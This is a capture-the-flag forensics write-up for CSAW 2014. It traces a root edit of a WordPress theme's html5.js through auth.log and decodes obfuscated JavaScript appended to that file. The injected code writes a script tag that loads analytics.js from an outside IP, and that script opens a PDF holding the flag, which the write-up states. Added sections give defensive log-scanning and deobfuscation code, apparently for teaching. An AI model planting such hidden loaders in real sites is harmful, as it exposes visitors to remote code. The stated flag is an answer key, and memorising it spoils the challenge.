2014 CSAW Qualifying CTF - Forensics 300

Written by: Justin G.

To start off, this challenge was extremely fun, but it seems very intimidating when you first start, because you have no idea what to look for. Here's how I solved this challenge.
When CSAW2014-FluffyNoMore-v0.1.tar.bz2 is unpacked it contains 3 other .tar.bz2 files and 1 .bz2 file.

When those files are unpacked, you are left with the following directories and files.

My first thought was to look for any strange files, especially any that were recently modified. That didn't lead anywhere significant. So my next logical step was to look at the logs. I first opened the Apache logs, however there was so much data there that I didn't spend a lot of time looking for anything. I then opened up auth.log, which contains the system authentication logs (including every sudo invocation). There were a lot of commands that looked fairly normal, then I saw this one that stuck out from all of the others.

Sep 17 19:20:09 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js

This was the only vi command that was run, and it was run as root against a theme file under the web root. So let's go take a look at that file.
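The check that surfaced this entry can be automated: parse the sudo lines of auth.log into their fields and flag any editor run as root against a path under the web root. The following is an added example, not part of the original write-up; the log lines are constructed samples (the second one is the entry quoted above, joined onto a single line), and the set of editors and watched prefixes is an assumption to be tuned per host.

```javascript
// Added example (not from the write-up): scan sudo entries in auth.log for
// editors invoked as root on files under the web root.
// Constructed sample log; line 2 is the entry from the write-up (joined onto one line).
const SAMPLE_AUTH_LOG = [
  "Sep 17 19:10:01 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/apt-get update",
  "Sep 17 19:20:09 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js",
  "Sep 17 19:20:10 ubuntu sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)",
  "Sep 17 19:25:33 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/ls /var/log",
];

// "Mon DD HH:MM:SS host sudo:   invoker : KEY=VALUE ; KEY=VALUE ; ..."
const SUDO_RE = /^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) sudo:\s+(\S+) : (.*)$/;

// Parse one sudo command entry; returns null for non-command lines (e.g. pam_unix session lines).
function parseSudoLine(line) {
  const m = SUDO_RE.exec(line);
  if (!m) return null;
  const fields = {};
  for (const part of m[4].split(" ; ")) {
    const eq = part.indexOf("=");
    if (eq > 0) fields[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  if (!fields.COMMAND) return null;
  return {
    timestamp: m[1],
    host: m[2],
    invoker: m[3],
    tty: fields.TTY,
    pwd: fields.PWD,
    runAs: fields.USER,
    command: fields.COMMAND,
  };
}

// Assumed lists: editors that modify files in place, and directories whose
// contents are served to browsers and therefore warrant a second look.
const EDITORS = new Set(["vi", "vim", "nano", "emacs", "ed", "sed", "tee"]);
const WATCHED_PREFIXES = ["/var/www/"];

// Return every parsed entry where an editor was run on a watched path.
function findWebRootEdits(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseSudoLine(line);
    if (!entry) continue;
    const argv = entry.command.split(/\s+/);
    const binary = argv[0].split("/").pop();
    const touchesWebRoot = argv.slice(1).some((arg) =>
      WATCHED_PREFIXES.some((prefix) => arg.startsWith(prefix)));
    if (EDITORS.has(binary) && touchesWebRoot) hits.push(entry);
  }
  return hits;
}

for (const hit of findWebRootEdits(SAMPLE_AUTH_LOG)) {
  console.log(`${hit.timestamp} ${hit.invoker} -> ${hit.runAs}: ${hit.command}`);
}
```

On the sample log this reports exactly the html5.js edit; the apt-get and ls entries and the pam_unix session line are ignored. A timeline of such hits is also the natural pivot into the file-modification times the write-up checked first.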

At the bottom of the file that was opened with vi was the following JavaScript code. I also looked at /themes/twentyfourteen/js/html5.js and /themes/twentytwelve/js/html5.js to make sure it wasn't part of the theme.

var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");   // [".", "li", "colgroup", "br", "src", "datalist", "script", "option", "."]
c = "";
k = "/";
m = f[6];           // "script"
// The lengths of the words (1,2,8,2,3,8,6,6,1) spell out the digits of the IP address
for (var i = 0; i < f.length; i++) {
    c += f[i].length.toString();
}
v = f[0];           // "."
x = "\'ht";
b = f[4];           // "src"
f = 2541 * 6 - 35 + 46 + 12 - 15269;            // 0
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;  // 0
c += f.toString();  // "12823866100"
f = "";
c = c.split("");
var w = 0;
u = "s";
// Insert the dots after digits 3, 6 and 8 to form "128.238.66.100"
for (var i = 0; i < c.length; i++) {
    if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
        f += String.fromCharCode(46);
        w++;
    }
    f += c[i];
}
i = k + "anal";
// Writes <script src='http://128.238.66.100/analytics.js'></script> into the page
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'><\/" + m + ">");

The code is an interesting attempt at obfuscating JavaScript. The very last line is the one I wanted to focus on, because it is the only part of the code that actually outputs anything. Now, there are two ways to move on from here, a safe way and a dirty way. I decided on the dirty way (I'll include what I should have done at the bottom of the write-up). I ran the code in Chrome's JavaScript console and it sent me to http://128.238.66.100/announcement.pdf (don't worry, it's not malicious).
Screenshot of PDF:

I downloaded the PDF and opened it with Adobe Reader and saw that the PDF had a file attached to it. However, Adobe was being all safe and secure and didn't allow me to open or save it.

I was working along with John H. and he pointed me in the direction of a program called pdftoolbox whose main purpose is to extract PDF attachments. I finally extracted the file and was able to cat its contents.

File Contents:

var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];

With a little hex to text conversion I was able to get:
YOU DID IT! CONGRATS! fwiw, JavaScript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}

key{Those Fluffy Bunnies Make Tummy Bumpy}

The Safe Way

So the "correct" way of decoding the JavaScript follows.
If I had simply run the code in Chrome's JavaScript console I would have had no idea what was about to happen. So instead I changed document.write to console.log and ran the code. It printed <script src='http://128.238.66.100/analytics.js'></script>. After grabbing that file and analyzing it I noticed two interesting lines stuck in the middle of the file in between the functions.

var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66",
"\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);
						
After decoding the hex, those lines turn into:
var _0x91fe = ["http://128.238.66.100/announcement.pdf", "_self", "open"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);
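Both the analytics.js lines above and the PDF attachment earlier in the write-up use the same trick: a string array whose elements are written as \xNN escapes, referenced by index. That can be decoded statically, without running anything. The following is an added example, not code from the write-up; the two snippets embedded in it are the ones quoted on this page, and the regular expressions assume the simple `var NAME = [ "...", ... ]` form seen here (it also accepts \uNNNN escapes, which this sample does not use).

```javascript
// Added example (not from the write-up): statically decode "\xNN" string
// arrays of the _0x... pattern and inline the references that use them.
// The two sources below are the snippets quoted in the write-up, verbatim.
const ANALYTICS_SNIPPET = String.raw`var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);`;

const ATTACHMENT_SNIPPET = String.raw`var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];`;

// Turn \xNN and \uNNNN escapes into the characters they encode.
function decodeHexEscapes(s) {
  return s.replace(/\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4}))/g,
    (_, hh, hhhh) => String.fromCharCode(parseInt(hh || hhhh, 16)));
}

// Find every `var NAME = [ "...", ... ]` literal and map NAME to its decoded strings.
function extractStringArrays(source) {
  const arrays = {};
  const arrayRe = /var\s+(\w+)\s*=\s*\[([^\]]*)\]/g;
  let m;
  while ((m = arrayRe.exec(source)) !== null) {
    const items = [];
    const stringRe = /"((?:[^"\\]|\\.)*)"/g;
    let s;
    while ((s = stringRe.exec(m[2])) !== null) items.push(decodeHexEscapes(s[1]));
    arrays[m[1]] = items;
  }
  return arrays;
}

// Replace NAME[n] references with the decoded literal so the code reads plainly.
function inlineArrayRefs(source, arrays) {
  return source.replace(/(\w+)\[(\d+)\]/g, (orig, name, idx) =>
    arrays[name] && arrays[name][idx] !== undefined ? JSON.stringify(arrays[name][idx]) : orig);
}

// Pull a key{...} flag out of decoded text, or null if there is none.
function extractFlag(text) {
  const m = /key\{[^}]*\}/.exec(text);
  return m ? m[0] : null;
}

for (const snippet of [ANALYTICS_SNIPPET, ATTACHMENT_SNIPPET]) {
  const arrays = extractStringArrays(snippet);
  console.log(inlineArrayRefs(snippet, arrays));
  for (const name of Object.keys(arrays)) console.log(name, "=", arrays[name]);
  const flag = extractFlag(Object.values(arrays).flat().join("\n"));
  if (flag) console.log("flag:", flag);
}
```

For the analytics.js lines this rewrites the call to window["open"]("http://128.238.66.100/announcement.pdf", "_self"), which is the whole behaviour of those two lines; for the attachment it yields the congratulation message and the key. The regular expressions are deliberately narrow: real obfuscators add array rotation, string concatenation and wrapper functions, and for those an AST-based rewrite is the better tool.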
						
You can see that it just opens the PDF location, so it's nothing harmful, but it could have been. Better safe than sorry; I probably should listen to my own advice.
